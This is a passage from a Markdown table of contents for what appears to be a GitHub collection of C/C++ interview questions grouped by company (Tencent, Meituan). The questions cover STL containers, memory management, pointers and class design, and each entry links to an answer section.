移动构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#111%E7%A7%BB%E5%8A%A8%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [3.4.9 C语言的编译链接过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#112c%E8%AF%AD%E8%A8%80%E7%9A%84%E7%BC%96%E8%AF%91%E9%93%BE%E6%8E%A5%E8%BF%87%E7%A8%8B) ##### [3.5.0 vector与list的区别与应用?怎么找某vector或者list的倒数第二个元素](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#113vector%E4%B8%8Elist%E7%9A%84%E5%8C%BA%E5%88%AB%E4%B8%8E%E5%BA%94%E7%94%A8%E6%80%8E%E4%B9%88%E6%89%BE%E6%9F%90vector%E6%88%96%E8%80%85list%E7%9A%84%E5%80%92%E6%95%B0%E7%AC%AC%E4%BA%8C%E4%B8%AA%E5%85%83%E7%B4%A0) ##### [3.5.1 STL vector的实现,删除其中的元素,迭代器如何变化?为什么是两倍扩容?释放空间?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#114stl-vector%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%88%A0%E9%99%A4%E5%85%B6%E4%B8%AD%E7%9A%84%E5%85%83%E7%B4%A0%E8%BF%AD%E4%BB%A3%E5%99%A8%E5%A6%82%E4%BD%95%E5%8F%98%E5%8C%96%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF%E4%B8%A4%E5%80%8D%E6%89%A9%E5%AE%B9%E9%87%8A%E6%94%BE%E7%A9%BA%E9%97%B4) ##### [3.5.2 容器内部删除一个元素](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#115%E5%AE%B9%E5%99%A8%E5%86%85%E9%83%A8%E5%88%A0%E9%99%A4%E4%B8%80%E4%B8%AA%E5%85%83%E7%B4%A0) ##### [3.5.3 STL迭代器如何实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#116stl%E8%BF%AD%E4%BB%A3%E5%99%A8%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0) ##### [3.5.4 set与hash_set的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#117set%E4%B8%8Ehash_set%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.5.5 hashmap与map的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#118hashmap%E4%B8%8Emap%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [3.5.6 map、set是怎么实现的,红黑树是怎么能够同时实现这两种容器? 为什么使用红黑树?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#119mapset%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E7%BA%A2%E9%BB%91%E6%A0%91%E6%98%AF%E6%80%8E%E4%B9%88%E8%83%BD%E5%A4%9F%E5%90%8C%E6%97%B6%E5%AE%9E%E7%8E%B0%E8%BF%99%E4%B8%A4%E7%A7%8D%E5%AE%B9%E5%99%A8-%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BD%BF%E7%94%A8%E7%BA%A2%E9%BB%91%E6%A0%91) ##### [3.5.7 如何在共享内存上使用stl标准库?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#120%E5%A6%82%E4%BD%95%E5%9C%A8%E5%85%B1%E4%BA%AB%E5%86%85%E5%AD%98%E4%B8%8A%E4%BD%BF%E7%94%A8stl%E6%A0%87%E5%87%86%E5%BA%93) <br> <h3 id="4">腾讯篇</h3> --- ##### [4.1.0 map插入方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#121map%E6%8F%92%E5%85%A5%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [4.1.1 STL中unordered_map(hash_map)和map的区别,hash_map如何解决冲突以及扩容](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#122stl%E4%B8%ADunordered_maphash_map%E5%92%8Cmap%E7%9A%84%E5%8C%BA%E5%88%ABhash_map%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3%E5%86%B2%E7%AA%81%E4%BB%A5%E5%8F%8A%E6%89%A9%E5%AE%B9) ##### [4.1.2 vector越界访问下标,map越界访问下标?vector删除元素时会不会释放空间?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#123vector%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE%E4%B8%8B%E6%A0%87map%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE%E4%B8%8B%E6%A0%87vector%E5%88%A0%E9%99%A4%E5%85%83%E7%B4%A0%E6%97%B6%E4%BC%9A%E4%B8%8D%E4%BC%9A%E9%87%8A%E6%94%BE%E7%A9%BA%E9%97%B4) ##### [4.1.3 map[]与find的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#124map%E4%B8%8Efind%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.1.4 STL中list与queue之间的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#125stl%E4%B8%ADlist%E4%B8%8Equeue%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.1.5 STL中的allocator,deallocator](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#126stl%E4%B8%AD%E7%9A%84allocatordeallocator) ##### [4.1.6 STL中hash_map扩容发生什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#127stl%E4%B8%ADhash_map%E6%89%A9%E5%AE%B9%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88) ##### [4.1.7 map如何创建?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#128map%E5%A6%82%E4%BD%95%E5%88%9B%E5%BB%BA) ##### [4.1.8 vector的增加删除都是怎么做的?为什么是1.5倍?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#129vector%E7%9A%84%E5%A2%9E%E5%8A%A0%E5%88%A0%E9%99%A4%E9%83%BD%E6%98%AF%E6%80%8E%E4%B9%88%E5%81%9A%E7%9A%84%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF15%E5%80%8D) ##### [4.1.9 函数指针?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#130%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88) ##### [4.2.0 说说你对c和c++的看法,c和c++的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#131%E8%AF%B4%E8%AF%B4%E4%BD%A0%E5%AF%B9c%E5%92%8Cc%E7%9A%84%E7%9C%8B%E6%B3%95c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.2.1 c/c++的内存分配,详细说一下栈、堆、静态存储区?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#132cc%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E8%AF%A6%E7%BB%86%E8%AF%B4%E4%B8%80%E4%B8%8B%E6%A0%88%E5%A0%86%E9%9D%99%E6%80%81%E5%AD%98%E5%82%A8%E5%8C%BA) ##### [4.2.2 堆与栈的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#133%E5%A0%86%E4%B8%8E%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.2.3 野指针是什么?如何检测内存泄漏?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#134%E9%87%8E%E6%8C%87%E9%92%88%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E6%A3%80%E6%B5%8B%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F) ##### [4.2.4 悬空指针和野指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#135%E6%82%AC%E7%A9%BA%E6%8C%87%E9%92%88%E5%92%8C%E9%87%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [4.2.5 内存泄漏](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#136%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F) ##### [4.2.6 new和malloc的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#137new%E5%92%8Cmalloc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.2.7 delete p;与delete[]p,allocator](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#138delete-p%E4%B8%8Edeletepallocator) ##### [4.2.8 new和delete的实现原理, delete是如何知道释放内存的大小的额?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#139new%E5%92%8Cdelete%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86-delete%E6%98%AF%E5%A6%82%E4%BD%95%E7%9F%A5%E9%81%93%E9%87%8A%E6%94%BE%E5%86%85%E5%AD%98%E7%9A%84%E5%A4%A7%E5%B0%8F%E7%9A%84%E9%A2%9D) ##### [4.2.9 malloc申请的存储空间能用delete释放吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#140malloc%E7%94%B3%E8%AF%B7%E7%9A%84%E5%AD%98%E5%82%A8%E7%A9%BA%E9%97%B4%E8%83%BD%E7%94%A8delete%E9%87%8A%E6%94%BE%E5%90%97) ##### [4.3.0 malloc与free的实现原理?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#141malloc%E4%B8%8Efree%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86) ##### [4.3.1 malloc、realloc、calloc的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#142mallocrealloccalloc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.3.2 __stdcall和__cdecl的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#143__stdcall%E5%92%8C__cdecl%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.3.3 使用智能指针管理内存资源,RAII](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#144%E4%BD%BF%E7%94%A8%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E7%AE%A1%E7%90%86%E5%86%85%E5%AD%98%E8%B5%84%E6%BA%90raii) ##### [4.3.4 手写实现智能指针类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#145%E6%89%8B%E5%86%99%E5%AE%9E%E7%8E%B0%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E7%B1%BB) ##### [4.3.5 内存对齐?位域?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#146%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90%E4%BD%8D%E5%9F%9F) ##### [4.3.6 结构体变量比较是否相等](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#147%E7%BB%93%E6%9E%84%E4%BD%93%E5%8F%98%E9%87%8F%E6%AF%94%E8%BE%83%E6%98%AF%E5%90%A6%E7%9B%B8%E7%AD%89) ##### [4.3.7 位运算](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#148%E4%BD%8D%E8%BF%90%E7%AE%97) ##### [4.3.8 为什么内存对齐](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#149%E4%B8%BA%E4%BB%80%E4%B9%88%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90) ##### [4.3.9 函数调用过程栈的变化,返回值和参数变量哪个先入栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#150%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E8%BF%87%E7%A8%8B%E6%A0%88%E7%9A%84%E5%8F%98%E5%8C%96%E8%BF%94%E5%9B%9E%E5%80%BC%E5%92%8C%E5%8F%82%E6%95%B0%E5%8F%98%E9%87%8F%E5%93%AA%E4%B8%AA%E5%85%88%E5%85%A5%E6%A0%88) ##### [4.4.0 怎样判断两个浮点数是否相等?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#151%E6%80%8E%E6%A0%B7%E5%88%A4%E6%96%AD%E4%B8%A4%E4%B8%AA%E6%B5%AE%E7%82%B9%E6%95%B0%E6%98%AF%E5%90%A6%E7%9B%B8%E7%AD%89) ##### [4.4.1 宏定义一个取两个数中较大值的功能](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#152%E5%AE%8F%E5%AE%9A%E4%B9%89%E4%B8%80%E4%B8%AA%E5%8F%96%E4%B8%A4%E4%B8%AA%E6%95%B0%E4%B8%AD%E8%BE%83%E5%A4%A7%E5%80%BC%E7%9A%84%E5%8A%9F%E8%83%BD) ##### [4.4.2 define、const、typedef、inline使用方法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#153defineconsttypedefinline%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95) ##### [4.4.3 printf实现原理?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#154printf%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86) ##### [4.4.4 #include 的顺序以及尖叫括号和双引号的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#155include-%E7%9A%84%E9%A1%BA%E5%BA%8F%E4%BB%A5%E5%8F%8A%E5%B0%96%E5%8F%AB%E6%8B%AC%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.4.5 lambda函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#156lambda%E5%87%BD%E6%95%B0) ##### [4.4.6 hello world 程序开始到打印到屏幕上的全过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#157hello-world-%E7%A8%8B%E5%BA%8F%E5%BC%80%E5%A7%8B%E5%88%B0%E6%89%93%E5%8D%B0%E5%88%B0%E5%B1%8F%E5%B9%95%E4%B8%8A%E7%9A%84%E5%85%A8%E8%BF%87%E7%A8%8B) ##### [4.4.7 模板类和模板函数的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#158%E6%A8%A1%E6%9D%BF%E7%B1%BB%E5%92%8C%E6%A8%A1%E6%9D%BF%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [4.4.8 为什么模板类一般都是放在一个h文件中](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#159%E4%B8%BA%E4%BB%80%E4%B9%88%E6%A8%A1%E6%9D%BF%E7%B1%BB%E4%B8%80%E8%88%AC%E9%83%BD%E6%98%AF%E6%94%BE%E5%9C%A8%E4%B8%80%E4%B8%AAh%E6%96%87%E4%BB%B6%E4%B8%AD) ##### [4.4.9 C++中类成员的访问权限和继承权限问题。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#160c%E4%B8%AD%E7%B1%BB%E6%88%90%E5%91%98%E7%9A%84%E8%AE%BF%E9%97%AE%E6%9D%83%E9%99%90%E5%92%8C%E7%BB%A7%E6%89%BF%E6%9D%83%E9%99%90%E9%97%AE%E9%A2%98) ##### [4.5.0 cout和printf有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#161cout%E5%92%8Cprintf%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [4.5.1 重载运算符?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#162%E9%87%8D%E8%BD%BD%E8%BF%90%E7%AE%97%E7%AC%A6) ##### [4.5.2 函数重载函数匹配原则](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#163%E5%87%BD%E6%95%B0%E9%87%8D%E8%BD%BD%E5%87%BD%E6%95%B0%E5%8C%B9%E9%85%8D%E5%8E%9F%E5%88%99) ##### [4.5.3 定义和声明的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#164%E5%AE%9A%E4%B9%89%E5%92%8C%E5%A3%B0%E6%98%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.5.4 C++类型转换有四种](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#165c%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2%E6%9C%89%E5%9B%9B%E7%A7%8D) ##### [4.5.5 全局变量和static变量的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#166%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8Cstatic%E5%8F%98%E9%87%8F%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.5.6 静态成员与普通成员的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#167%E9%9D%99%E6%80%81%E6%88%90%E5%91%98%E4%B8%8E%E6%99%AE%E9%80%9A%E6%88%90%E5%91%98%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.5.7 说一下理解 ifdef endif](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#168%E8%AF%B4%E4%B8%80%E4%B8%8B%E7%90%86%E8%A7%A3-ifdef-endif) ##### [4.5.8 隐式转换,如何消除隐式转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#169%E9%9A%90%E5%BC%8F%E8%BD%AC%E6%8D%A2%E5%A6%82%E4%BD%95%E6%B6%88%E9%99%A4%E9%9A%90%E5%BC%8F%E8%BD%AC%E6%8D%A2) ##### [4.5.9 多继承的优缺点,作为一个开发者怎么看待多继承](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#171%E5%A4%9A%E7%BB%A7%E6%89%BF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9%E4%BD%9C%E4%B8%BA%E4%B8%80%E4%B8%AA%E5%BC%80%E5%8F%91%E8%80%85%E6%80%8E%E4%B9%88%E7%9C%8B%E5%BE%85%E5%A4%9A%E7%BB%A7%E6%89%BF) ##### [4.6.0 迭代器++it,it++哪个好,为什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#172%E8%BF%AD%E4%BB%A3%E5%99%A8itit%E5%93%AA%E4%B8%AA%E5%A5%BD%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.6.1 模板和实现可不可以不写在一个文件里面?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#173%E6%A8%A1%E6%9D%BF%E5%92%8C%E5%AE%9E%E7%8E%B0%E5%8F%AF%E4%B8%8D%E5%8F%AF%E4%BB%A5%E4%B8%8D%E5%86%99%E5%9C%A8%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E9%87%8C%E9%9D%A2%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.6.2 在成员函数中调用delete this会出现什么问题?对象还可以使用吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#174%E5%9C%A8%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E4%B8%AD%E8%B0%83%E7%94%A8delete-this%E4%BC%9A%E5%87%BA%E7%8E%B0%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%E5%AF%B9%E8%B1%A1%E8%BF%98%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8%E5%90%97) ##### [4.6.3 智能指针的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#175%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [4.6.4 auto_ptr作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#176auto_ptr%E4%BD%9C%E7%94%A8) ##### [4.6.5 class、union、struct的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#177classunionstruct%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.6.6 动态联编与静态联编](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#178%E5%8A%A8%E6%80%81%E8%81%94%E7%BC%96%E4%B8%8E%E9%9D%99%E6%80%81%E8%81%94%E7%BC%96) ##### [4.6.7 动态编译与静态编译](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#179%E5%8A%A8%E6%80%81%E7%BC%96%E8%AF%91%E4%B8%8E%E9%9D%99%E6%80%81%E7%BC%96%E8%AF%91) ##### [4.6.8 动态链接和静态链接区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#180%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%92%8C%E9%9D%99%E6%80%81%E9%93%BE%E6%8E%A5%E5%8C%BA%E5%88%AB) ##### [4.6.9 在不使用额外空间的情况下,交换两个数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#181%E5%9C%A8%E4%B8%8D%E4%BD%BF%E7%94%A8%E9%A2%9D%E5%A4%96%E7%A9%BA%E9%97%B4%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%E4%BA%A4%E6%8D%A2%E4%B8%A4%E4%B8%AA%E6%95%B0) ##### [4.7.0 strcpy和memcpy的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#182strcpy%E5%92%8Cmemcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.7.1 执行int main(int argc, char *argv[])时的内存结构](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#183%E6%89%A7%E8%A1%8Cint-mainint-argc-char-argv%E6%97%B6%E7%9A%84%E5%86%85%E5%AD%98%E7%BB%93%E6%9E%84) ##### [4.7.2 volatile关键字的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#184volatile%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [4.7.3 讲讲大端小端,如何检测(三种方法)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#185%E8%AE%B2%E8%AE%B2%E5%A4%A7%E7%AB%AF%E5%B0%8F%E7%AB%AF%E5%A6%82%E4%BD%95%E6%A3%80%E6%B5%8B%E4%B8%89%E7%A7%8D%E6%96%B9%E6%B3%95) ##### [4.7.4 查看内存的方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#186%E6%9F%A5%E7%9C%8B%E5%86%85%E5%AD%98%E7%9A%84%E6%96%B9%E6%B3%95) ##### [4.7.5 空类会默认添加哪些东西?怎么写?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#187%E7%A9%BA%E7%B1%BB%E4%BC%9A%E9%BB%98%E8%AE%A4%E6%B7%BB%E5%8A%A0%E5%93%AA%E4%BA%9B%E4%B8%9C%E8%A5%BF%E6%80%8E%E4%B9%88%E5%86%99) ##### [4.7.6 标准库是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#188%E6%A0%87%E5%87%86%E5%BA%93%E6%98%AF%E4%BB%80%E4%B9%88) ##### [4.7.7 new、delete、operator new、operator delete、placement new、placement delete](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#189newdeleteoperator-newoperator-deleteplacement-newplacement-delete) ##### [4.7.8 为什么拷贝构造函数必须传引用不能传值?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#190%E4%B8%BA%E4%BB%80%E4%B9%88%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%BF%85%E9%A1%BB%E4%BC%A0%E5%BC%95%E7%94%A8%E4%B8%8D%E8%83%BD%E4%BC%A0%E5%80%BC) ##### [4.7.9 空类的大小是多少?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#191%E7%A9%BA%E7%B1%BB%E7%9A%84%E5%A4%A7%E5%B0%8F%E6%98%AF%E5%A4%9A%E5%B0%91%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.8.0 你什么情况用指针当参数,什么时候用引用,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#192%E4%BD%A0%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E7%94%A8%E6%8C%87%E9%92%88%E5%BD%93%E5%8F%82%E6%95%B0%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%A8%E5%BC%95%E7%94%A8%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.8.1 大内存申请时候选用哪种?C++变量存在哪?变量的大小存在哪?符号表存在哪?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#193%E5%A4%A7%E5%86%85%E5%AD%98%E7%94%B3%E8%AF%B7%E6%97%B6%E5%80%99%E9%80%89%E7%94%A8%E5%93%AA%E7%A7%8Dc%E5%8F%98%E9%87%8F%E5%AD%98%E5%9C%A8%E5%93%AA%E5%8F%98%E9%87%8F%E7%9A%84%E5%A4%A7%E5%B0%8F%E5%AD%98%E5%9C%A8%E5%93%AA%E7%AC%A6%E5%8F%B7%E8%A1%A8%E5%AD%98%E5%9C%A8%E5%93%AA) <br> <h3 id="5">美团篇</h3> --- ##### [5.1.0 为什么会有大端小端,htol这一类函数的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#194%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BC%9A%E6%9C%89%E5%A4%A7%E7%AB%AF%E5%B0%8F%E7%AB%AFhtol%E8%BF%99%E4%B8%80%E7%B1%BB%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [5.1.1 静态函数能定义为虚函数吗?常函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#195%E9%9D%99%E6%80%81%E5%87%BD%E6%95%B0%E8%83%BD%E5%AE%9A%E4%B9%89%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97%E5%B8%B8%E5%87%BD%E6%95%B0) ##### [5.1.2 this指针调用成员变量时,堆栈会发生什么变化?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#196this%E6%8C%87%E9%92%88%E8%B0%83%E7%94%A8%E6%88%90%E5%91%98%E5%8F%98%E9%87%8F%E6%97%B6%E5%A0%86%E6%A0%88%E4%BC%9A%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88%E5%8F%98%E5%8C%96) ##### [5.1.3 静态绑定和动态绑定的介绍](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#197%E9%9D%99%E6%80%81%E7%BB%91%E5%AE%9A%E5%92%8C%E5%8A%A8%E6%80%81%E7%BB%91%E5%AE%9A%E7%9A%84%E4%BB%8B%E7%BB%8D) ##### [5.1.4 设计一个类计算子类的个数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#198%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E7%B1%BB%E8%AE%A1%E7%AE%97%E5%AD%90%E7%B1%BB%E7%9A%84%E4%B8%AA%E6%95%B0) ##### [5.1.5 怎么快速定位错误出现的地方](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#199%E6%80%8E%E4%B9%88%E5%BF%AB%E9%80%9F%E5%AE%9A%E4%BD%8D%E9%94%99%E8%AF%AF%E5%87%BA%E7%8E%B0%E7%9A%84%E5%9C%B0%E6%96%B9) ##### [5.1.6 虚函数的代价?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#200%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E4%BB%A3%E4%BB%B7) ##### [5.1.7 类对象的大小](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#201%E7%B1%BB%E5%AF%B9%E8%B1%A1%E7%9A%84%E5%A4%A7%E5%B0%8F) ##### [5.1.8 移动构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#202%E7%A7%BB%E5%8A%A8%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.1.9 何时需要合成构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#203%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E5%90%88%E6%88%90%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.2.0 何时需要合成复制构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#204%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E5%90%88%E6%88%90%E5%A4%8D%E5%88%B6%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.2.1 何时需要成员初始化列表?过程是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#205%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E6%88%90%E5%91%98%E5%88%9D%E5%A7%8B%E5%8C%96%E5%88%97%E8%A1%A8%E8%BF%87%E7%A8%8B%E6%98%AF%E4%BB%80%E4%B9%88) ##### [5.2.2 程序员定义的析构函数被扩展的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#206%E7%A8%8B%E5%BA%8F%E5%91%98%E5%AE%9A%E4%B9%89%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E8%A2%AB%E6%89%A9%E5%B1%95%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [5.2.3 构造函数的执行算法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#207%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E7%AE%97%E6%B3%95) ##### [5.2.4 构造函数的扩展过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#208%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A9%E5%B1%95%E8%BF%87%E7%A8%8B) ##### [5.2.5 哪些函数不能是虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#209%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [5.2.6 sizeof 和strlen 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#210sizeof-%E5%92%8Cstrlen-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.2.7 